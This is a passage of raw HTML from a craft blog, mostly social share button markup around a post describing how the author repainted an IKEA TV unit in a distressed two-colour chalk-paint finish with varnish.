Snowman&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F%22%3ECrochet+Snowman%3C%2Fa%3E&#39;,&#39;livejournal&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_livejournal"></span><span class=essb_network_name>LiveJournal</span></a></li><li class="essb_item essb_link_yammer nolightbox"> <a href="https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=Crochet%20Snowman http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F" title onclick="essb.window(&#39;https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=Crochet%20Snowman http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F05%2Fcrochet-snowman%2F&#39;,&#39;yammer&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yammer"></span><span class=essb_network_name>Yammer</span></a></li><li class="essb_item essb_link_meetedgar nolightbox"> <a href="javascript:(function()%7B!function()%7Bvar e%3Ddocument.getElementsByTagName(&quot;head&quot;)%5B0%5D,t%3Ddocument.createElement(&quot;script&quot;)%3Bt.type%3D&quot;text/javascript&quot;,t.src%3D&quot;//app.meetedgar.com/share.js%3F&quot;%2BMath.floor(99999*Math.random()),e.appendChild(t)%7D()%7D)()%3B" title onclick="essb.tracking_only('', 'meetedgar', '2143012894', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meetedgar"></span><span class=essb_network_name>Edgar</span></a></li><li class="essb_item essb_link_fintel nolightbox"> <a href="https://fintel.io/submit?url=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://fintel.io/submit?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;fintel&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_fintel"></span><span class=essb_network_name>Fintel</span></a></li><li class="essb_item essb_link_mix nolightbox"> <a href="https://mix.com/extension/add?source=http://zoomyummy.com/2017/12/05/crochet-snowman/" title onclick="essb.window(&#39;https://mix.com/extension/add?source=http://zoomyummy.com/2017/12/05/crochet-snowman/&#39;,&#39;mix&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mix"></span><span class=essb_network_name>Mix</span></a></li><li class="essb_item essb_link_instapaper nolightbox"> <a href="https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&description=" title onclick="essb.window(&#39;https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/12/05/crochet-snowman/&title=Crochet+Snowman&description=&#39;,&#39;instapaper&#39;,&#39;2143012894&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_instapaper"></span><span class=essb_network_name>Instapaper</span></a></li></ul></div></div></div><div class="essb_morepopup_shadow essb_morepopup_shadow_1753641447" onclick="essb.toggle_less_popup('1753641447'); return false;"></div><div class="essb-subscribe-form essb-subscribe-form-2143012894 essb-subscribe-form-popup" data-popup=1 style="display: none;"><div class="essb-subscribe-form-content essb-subscribe-from-design1" data-position=sharebuttons-more data-design=design1><h4 class="essb-subscribe-form-content-title">Join our list</h4><p class=essb-subscribe-form-content-text>Subscribe to our mailing list and get interesting stuff and updates to your email inbox.</p><form action="https://zoomyummy.com?essb3_subscribe_nonce=771d655b92&essb-malchimp-signup=1" method=post class=essb-subscribe-from-content-form id=essb-subscribe-from-content-form-mailchimp><input class=essb-subscribe-form-content-email-field type=text value placeholder="Enter your email here" name=mailchimp_email><input class=submit name=submit type=submit value="Sign Up Now" onclick="essb.ajax_subscribe('2143012894', event);"></form><div class=essb-subscribe-loader> <svg version=1.1 id=loader-1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink x=0px y=0px width=40px height=40px viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space=preserve> <path fill=#000 d=M43.935,25.145c0-10.318-8.364-18.683-18.683-18.683c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615c8.072,0,14.615,6.543,14.615,14.615H43.935z> <animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"/> </path> </svg></div><p class="essb-subscribe-form-content-success essb-subscribe-form-result-message">Thank you for subscribing.</p><p class="essb-subscribe-form-content-error essb-subscribe-form-result-message">Something went wrong.</p><div class=clear></div><p class=essb-subscribe-form-content-footer>We respect your privacy and take protecting it seriously</p></div><button type=button class=essb-subscribe-form-close onclick="essb.subscribe_popup_close('2143012894');">x</button></div><div class="essb-subscribe-form-overlay essb-subscribe-form-overlay-2143012894" onclick="essb.subscribe_popup_close('2143012894');"></div></div><footer class=entry-meta> <span class=cat-links><span class=screen-reader-text>Categories </span><a href=https://zoomyummy.com/category/crochet/ rel="category tag">crochet</a>, <a href=https://zoomyummy.com/category/winter/ rel="category tag">winter</a></span><span class=tags-links><span class=screen-reader-text>Tags </span><a href=https://zoomyummy.com/tag/christmas/ rel="nofollow tag">Christmas</a>, <a href=https://zoomyummy.com/tag/crochet/ rel="nofollow tag">crochet</a>, <a href=https://zoomyummy.com/tag/snowman/ rel="nofollow tag">snowman</a>, <a href=https://zoomyummy.com/tag/winter/ rel="nofollow tag">winter</a></span><span class=comments-link><a href=https://zoomyummy.com/2017/12/05/crochet-snowman/#comments rel=nofollow>9 Comments</a></span></footer></div></article><div class=googleadbox> <script async src=//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script> <ins class=adsbygoogle style=display:inline-block;width:336px;height:280px data-ad-client=ca-pub-5571995028593943 data-ad-slot=7373696885></ins> <script>(adsbygoogle=window.adsbygoogle||[]).push({});</script> </div><article id=post-54606 class="post-54606 post type-post status-publish format-standard hentry category-furniture tag-chalk-paint tag-furniture" itemtype=http://schema.org/CreativeWork itemscope=itemscope><div class=inside-article><header class=entry-header><h2 class="entry-title" itemprop="headline"><a href=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ rel=bookmark>Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)</a></h2><div class=entry-meta> <span class=posted-on><a href=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ title="2:41 pm" rel=bookmark><time class="entry-date published" datetime=2017-09-10T14:41:59+01:00 itemprop=datePublished>September 10, 2017</time><time class=updated datetime=2017-09-10T14:42:00+01:00 itemprop=dateModified>September 10, 2017</time></a></span> <span class=byline><span class="author vcard" itemtype=http://schema.org/Person itemscope=itemscope itemprop=author>by <a class="url fn n" href=https://zoomyummy.com/author/zoomyummy/ title="View all posts by zoomyummy" rel=author itemprop=url><span class=author-name itemprop=name>zoomyummy</span></a></span></span></div></header><div class=entry-content itemprop=text> <input class=jpibfi type=hidden><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-1-c-wm.jpg alt="painting furniture with chalk paint" width=630 height=422 class="aligncenter size-full wp-image-54609" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-1-c-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-1-c-wm-597x400.jpg 597w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-1-c-wm.jpg></p><blockquote><p> Hi friends!</p><p>Yes, my project of pouring more color into our home continues. And, as promised, I did it again &#8211; I could not resist and gave the chalk paint another job to do. This time, I laid my eyes on the TV unit in our living room.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-2-wm.jpg alt="painting furniture with chalk paint" width=630 height=422 class="aligncenter size-full wp-image-54613" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-2-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-2-wm-597x400.jpg 597w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-2-wm.jpg></p><blockquote><p> This is what the TV unit looked like originally. It is Ikea&#8217;s BESTÅ.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-3-wm.jpg alt="painting furniture with chalk paint" width=630 height=420 class="aligncenter size-full wp-image-54615" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-3-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-3-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-3-wm.jpg></p><blockquote><p>Here&#8217;s what I used: one 230-ml jar of country blue Dekor Paint Soft (chalk paint) from Paintart, two 230-ml jars of vintage brown Dekor Paint Soft (chalk paint) from Pentart, a brush, a fine sanding block and finally, after some reconsideration, I replaced the wax (shown in the picture) and decided to give varnish one more try (I was a little hesitant after my not so happy experience from <a href=https://zoomyummy.com/2017/08/02/painting-furniture-with-chalk-paint/ target=_blank>the previous project</a>, where the varnish contained lumps and I did not really know what I should think about that). The new varnish I used was a transparent matte acrylic varnish for wood called Sportakryl from Balakryl and it worked like a charm, phewww.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm.jpg alt="painting furniture with chalk paint" width=630 height=420 class="aligncenter size-full wp-image-54617" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm.jpg></p><blockquote><p>As in my <a href=https://zoomyummy.com/2017/08/02/painting-furniture-with-chalk-paint/ target=_blank>previous chalk paint project</a>, I went for this fun shabby look, where you first paint your furniture one color (I first applied two layers of brown) and then paint with a different color (I used one layer of country blue).</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm-1.jpg alt="painting furniture with chalk paint" width=630 height=420 class="aligncenter size-full wp-image-54619" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm-1.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm-1-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-4-wm-1.jpg></p><blockquote><p>When all paint is nice and dry, you then use a fine sanding block to distress the top coat of paint here and there, mostly on the edges where the natural wear would appear.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-6-wm-1.jpg alt="painting furniture with chalk paint" width=630 height=420 class="aligncenter size-full wp-image-54629" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-6-wm-1.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-6-wm-1-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-6-wm-1.jpg></p><blockquote><p>Finally a layer of varnish is applied and that&#8217;s it. So easy. So much fun.</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-7-wm-b.jpg alt="painting furniture with chalk paint" width=630 height=422 class="aligncenter size-full wp-image-54627" srcset="https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-7-wm-b.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-7-wm-b-597x400.jpg 597w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-jpibfi-post-title="Aaaand I Did It Again (&#8230; Painting Furniture With Chalk Paint)" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/09/blue-tv-table-7-wm-b.jpg></p><blockquote><p>Although I am aware that this look might not be for everyone, I just can&#8217;t get enough of it. For me, it produces very unique pieces of furniture that look straight out of a fairy tale. Love it so much!</p><p>Thanks for letting me share.</p><p>With love,</p><p>Petra xoxo</p><p>&nbsp;</p></blockquote><div class="essb_links essb_counters essb_counter_modern_top essb_displayed_bottom essb_share essb_template_clear-retina essb_391309640 essb_links_center print-no" id=essb_displayed_bottom_391309640 data-essb-postid=54606 data-essb-position=bottom data-essb-button-style=icon data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-essb-twitter-url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-essb-instance=391309640><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_totalcount_item" style="display: none !important;" data-counter-pos=left><span class="essb_totalcount essb_t_l" title="Total: "><span class=essb_total_text>Total: </span><span class=essb_t_nb>125</span></span></li><li class="essb_item essb_link_print nolightbox"> <span class=essb_counter data-cnt=14 data-cnt-short=14>14</span><a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;print_friendly&#39;,&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_facebook nolightbox"> <span class=essb_counter data-cnt=1 data-cnt-short=1>1</span><a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;facebook&#39;,&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <span class=essb_counter data-cnt=41 data-cnt-short=41>41</span><a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&amp;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;counturl=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;twitter&#39;,&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <span class=essb_counter data-cnt=9 data-cnt-short=9>9</span><a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;google&#39;,&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <span class=essb_counter data-cnt=2 data-cnt-short=2>2</span><a href=# title onclick="essb.pinterest_picker(&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <span class=essb_counter data-cnt=13 data-cnt-short=13>13</span><a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;stumbleupon&#39;,&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_mail nolightbox"> <span class=essb_counter data-cnt=45 data-cnt-short=45>45</span><a href=# title onclick="essb_open_mailform(&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_more nolightbox"> <a href=# title onclick="essb.toggle_more_popup(&#39;391309640&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_more"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div><div class="essb_morepopup essb_morepopup_391309640 essb_morepopup_bottom" style=display:none;> <a href=# class=essb_morepopup_close onclick="essb.toggle_less_popup('391309640'); return false;"><i class=essb_icon_close></i></a><div class="essb_morepopup_content essb_morepopup_content_391309640"><div class="essb_links essb_displayed_more_popup essb_share essb_template_clear-retina essb_1804696349 essb_width_columns_3 essb_links_center print-no" id=essb_displayed_more_popup_1804696349 data-essb-postid=54606 data-essb-position=more_popup data-essb-button-style=button data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-essb-twitter-url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/ data-essb-instance=1804696349><ul class=essb_links_list><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;facebook&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class=essb_network_name>Facebook</span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&amp;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;counturl=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;twitter&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class=essb_network_name>Twitter</span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;google&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class=essb_network_name>Google+</span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href=# title onclick="essb.pinterest_picker(&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class=essb_network_name>Pinterest</span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&amp;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&amp;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;linkedin&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_linkedin"></span><span class=essb_network_name>LinkedIn</span></a></li><li class="essb_item essb_link_digg nolightbox"> <a href="http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;digg&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_digg"></span><span class=essb_network_name>Digg</span></a></li><li class="essb_item essb_link_del nolightbox"> <a href="https://del.icio.us/login?log=out&provider=essb&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&v=5" title onclick="essb.window(&#39;https://del.icio.us/login?log=out&provider=essb&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&v=5&#39;,&#39;del&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_del"></span><span class=essb_network_name>Del</span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;stumbleupon&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class=essb_network_name>StumbleUpon</span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.window(&#39;http://tumblr.com/share?s=&v=3&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&#39;,&#39;tumblr&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_tumblr"></span><span class=essb_network_name>Tumblr</span></a></li><li class="essb_item essb_link_vk nolightbox"> <a href="http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;vk&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_vk"></span><span class=essb_network_name>VKontakte</span></a></li><li class="essb_item essb_link_print nolightbox"> <a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;print_friendly&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class=essb_network_name>Print</span></a></li><li class="essb_item essb_link_mail nolightbox"> <a href=# title onclick="essb_open_mailform(&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class=essb_network_name>Email</span></a></li><li class="essb_item essb_link_flattr nolightbox"> <a href="https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&title=Aaaand%2BI%2BDid%2BIt%2BAgain%2B%2528...%2BPainting%2BFurniture%2BWith%2BChalk%2BPaint%2529&description=+Hi+friends%21+Yes%2C+my+project+of+pouring+more+color+into+our+home+continues.+And%2C+as+promised%2C+I+did+it+again+-+I+could+not+resist+and+gave+the+chalk+paint+another+job+to+do.+This+time%2C+I+laid+my+eyes+on+the+TV+unit+in+our+living+room.+%26nbsp%3B+%26nbsp%3B+This+is+what+the+TV+unit+looked+like+originally.+It+is+Ikea%27s+BEST%C3%85.+%26nbsp%3B+%26nbsp%3B+Here%27s+what+I+used%3A+one+230-ml+jar+of+country+blue+Dekor+Paint+Soft+%28chalk+paint%29+from+Paintart%2C+two+230-ml+jars+of+vintage+brown+Dekor+Paint+Soft+%28chalk+paint%29+from+Pentart%2C+a+brush%2C+a+fine+sanding+block+and+finally%2C+after+some+reconsideration%2C+I+replaced+the+wax+%28shown+in+the+picture%29+and+decided+to+give+varnish+one+more+try+%28I+was+a+little+hesitant+after+my+not+so+happy+experience+from+the+previous+project%2C+where+the+varnish+contained+lumps+and+I+did+not+really+know+what+I+should+think+about+that%29.+The+new+varnish+I+used+was+a+transparent+matte+acrylic+varnish+for+wood+called+Sportakryl+from+Balakryl+and+it+worked+like+a+charm&language=sq_AL&tags=chalk+paint%2Cfurniture&hidden=0&category=text" title onclick="essb.window(&#39;https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&title=Aaaand%2BI%2BDid%2BIt%2BAgain%2B%2528...%2BPainting%2BFurniture%2BWith%2BChalk%2BPaint%2529&description=+Hi+friends%21+Yes%2C+my+project+of+pouring+more+color+into+our+home+continues.+And%2C+as+promised%2C+I+did+it+again+-+I+could+not+resist+and+gave+the+chalk+paint+another+job+to+do.+This+time%2C+I+laid+my+eyes+on+the+TV+unit+in+our+living+room.+%26nbsp%3B+%26nbsp%3B+This+is+what+the+TV+unit+looked+like+originally.+It+is+Ikea%27s+BEST%C3%85.+%26nbsp%3B+%26nbsp%3B+Here%27s+what+I+used%3A+one+230-ml+jar+of+country+blue+Dekor+Paint+Soft+%28chalk+paint%29+from+Paintart%2C+two+230-ml+jars+of+vintage+brown+Dekor+Paint+Soft+%28chalk+paint%29+from+Pentart%2C+a+brush%2C+a+fine+sanding+block+and+finally%2C+after+some+reconsideration%2C+I+replaced+the+wax+%28shown+in+the+picture%29+and+decided+to+give+varnish+one+more+try+%28I+was+a+little+hesitant+after+my+not+so+happy+experience+from+the+previous+project%2C+where+the+varnish+contained+lumps+and+I+did+not+really+know+what+I+should+think+about+that%29.+The+new+varnish+I+used+was+a+transparent+matte+acrylic+varnish+for+wood+called+Sportakryl+from+Balakryl+and+it+worked+like+a+charm&language=sq_AL&tags=chalk+paint%2Cfurniture&hidden=0&category=text&#39;,&#39;flattr&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flattr"></span><span class=essb_network_name>Flattr</span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;http://reddit.com/submit?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;reddit&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_reddit"></span><span class=essb_network_name>Reddit</span></a></li><li class="essb_item essb_link_buffer nolightbox"> <a 